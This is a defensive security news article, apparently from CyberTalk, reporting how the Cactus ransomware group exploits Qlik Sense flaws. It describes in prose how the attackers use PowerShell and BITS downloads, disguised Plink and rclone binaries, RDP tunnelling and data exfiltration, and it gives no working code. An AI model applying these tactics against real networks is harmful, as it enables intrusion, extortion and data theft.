During the past year, large language models (LLMs) AIs have become incredibly adept at generating, synthesizing information and…
Antarctica’s Ancient Ice Sheets Foreshadow Dynamic Changes in Earth’s Future – Technology Org
Nineteen million years ago, during a time known as the early Miocene, massive ice sheets in Antarctica rapidly…
Cactus ransomware, compromising networks through Qlik Sense – CyberTalk
EXECUTIVE SUMMARY:
The Cactus cyber criminal group is currently exploiting three different security flaws within the Qlik Sense platform, a versatile cloud analytics engine, in order to execute ransomware attacks.
In the past, Cactus criminals have targeted prominent global, commercial organizations; embarrassing victims by publishing their names and brief corresponding descriptions on a dark web leak channel.
To avoid the Qlik Sense threat, understand the Cactus group’s tactics, techniques and procedures (TTPs). Keep reading to learn more:
Critical vulnerabilities
In August, Qlik Sense released security updates pertaining to two critical vulnerabilities that affected the Windows version of the platform. One such vulnerability, tracked as CVE-2023-41266, could be used to generate anonymous sessions and perform HTTP requests to unauthorized endpoints.
The second vulnerability, tracked as CVE-2023-41265, with a critical severity of 9.8, can be leveraged for privilege elevation purposes and to execute HTTP requests on the backend server hosting the application. This bug doesn’t require authorization of any kind in order for hackers to exploit it.
In September, Qlik Sense found that the fix for CVE-2023-41265 failed to deliver and developers provided a new update. Afterwards, tracking for the issue resumed under a different CVE.
According to a recent cyber security research report, the ransomware group known as Cactus is actively exploiting the aforementioned flaws on publicly-exposed Qlik Sense instances that remain unpatched.
Breach methodology explained
These Cactus ransomware attacks prey on Qlik Sense’s security vulnerabilities and execute code that triggers the Qlik Sense Scheduler service to initiate new processes.
The cyber criminals employ PowerShell and the Background Intelligent Transfer Service (BITS) to download tools that establish persistence and enable remote access to the machine:
- ManageEngine UEMS executables posing as Qlik files
- AnyDesk obtained directly from the official website
- A Plink (PuTTY Link) binary renamed to “putty.exe”
In addition, Cactus executes multiple discovery commands redirecting output into .TTF files, believed by researchers to command output via path traversal.
To remain hidden and to gather information, Cactus changes the administrator password, establishes an RDP tunnel using the Plink command-line connection tool, and more.
In the final stage of the attack, the threat actors deploy the Cactus ransomware on the compromised system (highlighting the importance of securing Qlik Sense against sophisticated threats).
Additional attack information
Emerging evidence points to hackers skillfully employing RDP for discreet lateral movements. WizTree serves as a disk space analysis tool, while rclone, cleverly disguised as ‘svchost.exe,’ facilitates the covert exfiltration of data. The tools and techniques align with the patterns observed in previous Cactus ransomware attacks, as described by researchers.
Cactus ransomware group insights
The Cactus ransomware group made its debut in March of this year, immediately deploying the double-extortion ransomware tactic. This approach involves both stealing the victims’ data and encrypting it on compromised systems.
Researchers have underscored the significance of this ransomware operation due to its use of encryption to shield the malware binary from detection via security products.
This general vulnerability disclosure comes as the ransomware landscape becomes more sophisticated and as the ransomware economy has begun to scale.
To better protect your business, check out this CISO’s Guide to Ransomware prevention. Plus, explore advanced anti-ransomware technologies here. Lastly, to receive timely cyber security insights, exclusive interviews, and cutting-edge analyses, please sign up for the cybertalk.org newsletter.
Innovative Design Achieves Tenfold Better Resolution for Functional MRI Brain Imaging – Technology Org
An intense international effort to improve the resolution of magnetic resonance imaging (MRI) for studying the human brain…
Astronomers Find ‘Tilted’ Planets Even in Pristine Solar Systems – Technology Org
Understanding that even planets in pristine solar systems have some orbital tilt puts Earth’s solar system into a…
Disc Around Star Observed in Another Galaxy for the First Time – Technology Org
Astronomers have uncovered evidence of a rotating disc of material circling a massive young star in a nearby…
Gut Bacteria Show Promise for Thwarting Toxic Effects of Cadmium – Technology Org
As a heavy metal that can persist in the human body for decades — and enter it by…
How Robots Are Learning to Ask for Help
In the evolving world of robotics, a groundbreaking collaboration between Princeton University and Google stands out. Engineers from these prestigious institutions have developed an innovative method that teaches robots a crucial skill: recognizing when they need help and how to ask for it. This development marks…
The Role of Mobile Technology in Reshaping Bad Credit Finance – Technology Org
In the ever-changing financial landscape, mobile technology is making waves, particularly in the sector of bad credit finance….
How The Right Browser Choices Make A Productivity Difference – Technology Org
Today, where time is a precious commodity, finding ways to boost productivity has become a universal pursuit. Many…